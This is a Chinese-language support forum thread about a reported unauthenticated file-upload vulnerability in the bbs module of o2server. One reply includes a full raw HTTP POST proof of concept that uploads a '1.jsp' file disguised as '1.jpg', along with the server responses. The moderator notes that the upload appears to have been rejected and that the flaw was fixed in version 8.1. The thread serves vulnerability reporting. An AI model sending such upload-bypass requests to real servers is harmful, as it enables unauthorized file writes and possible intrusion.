查看: 1596|回复: 6

文件上传有漏洞

升级   35%

35

主题

47

回帖

675

积分

高级会员

Rank: 4

积分
675
发表于 2023-11-4 16:05:39 | 显示全部楼层 |阅读模式
本帖最后由 feifeimao 于 2023-11-4 16:06 编辑

平台被检测到有文件上传的漏洞,这个看起来应该是论坛模块的

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

Ray

升级   100%

31

主题

203

回帖

865

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
865
发表于 2023-11-6 11:29:13 | 显示全部楼层
具体的漏洞形式是什么,任意文件上传还是什么?
回复

使用道具 举报

升级   35%

35

主题

47

回帖

675

积分

高级会员

Rank: 4

积分
675
发表于 2023-11-6 12:04:05 | 显示全部楼层
Ray 发表于 2023-11-6 11:29
具体的漏洞形式是什么,任意文件上传还是什么?

能上传任意文件
回复

使用道具 举报

升级   100%

138

主题

1万

回帖

3万

积分

超级版主

Rank: 8Rank: 8

积分
37249
发表于 2023-11-6 17:20:25 | 显示全部楼层
您是什么版本的o2server?这个问题已经修复过了的,应该在8.1的版本就修复好了
回复

使用道具 举报

升级   5.67%

15

主题

20

回帖

217

积分

中级会员

Rank: 3Rank: 3

积分
217
发表于 2023-11-6 17:20:55 | 显示全部楼层
Ray 发表于 2023-11-6 11:29
具体的漏洞形式是什么,任意文件上传还是什么?

未授权任意文件上传,可以在不登录情况下直接往bbs下面存储文件夹写文件

[Shell] 纯文本查看 复制代码
POST /x_bbs_assemble_control/jaxrs/attachment/upload/subject/161ccc21-3178-4e21-9b6f-5d36aed65ecb HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1435424574173394427053965142
Content-Length: 467
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
SL-CE-SUID: 21


-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="site"


161ccc21-3178-4e21-9b6f-5d36aed65ecb

-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="file"; filename="1.jsp"


123

-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="fileName"

1.jpg

-----------------------------1435424574173394427053965142--
回复

使用道具 举报

升级   5.67%

15

主题

20

回帖

217

积分

中级会员

Rank: 3Rank: 3

积分
217
发表于 2023-11-6 17:43:34 | 显示全部楼层
{
  "type": "success",
  "data": {
    "id": "0b0dd619-619a-433a-8578-1fd863117092"
  },
  "message": "",
  "date": "2023-11-05 22:55:05",
  "spent": 1674,
  "size": -1,
  "count": 0,
  "position": 0
}

{
  "type": "error",
  "message": "附件:1.jsp, 不符合上传类型.",
  "date": "2023-11-05 22:56:41",
  "spent": 7,
  "size": -1,
  "count": 0,
  "position": 0,
  "prompt": "com.x.base.core.project.exception.ExceptionAttachmentInvalid"
}
回复

使用道具 举报

升级   100%

138

主题

1万

回帖

3万

积分

超级版主

Rank: 8Rank: 8

积分
37249
发表于 2023-11-7 09:19:50 | 显示全部楼层
不明白您的意思,看提示不是没上传成功吗?
回复

使用道具 举报

发表回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

联系客服 关注微信 下载APP 返回顶部 返回列表
viewthread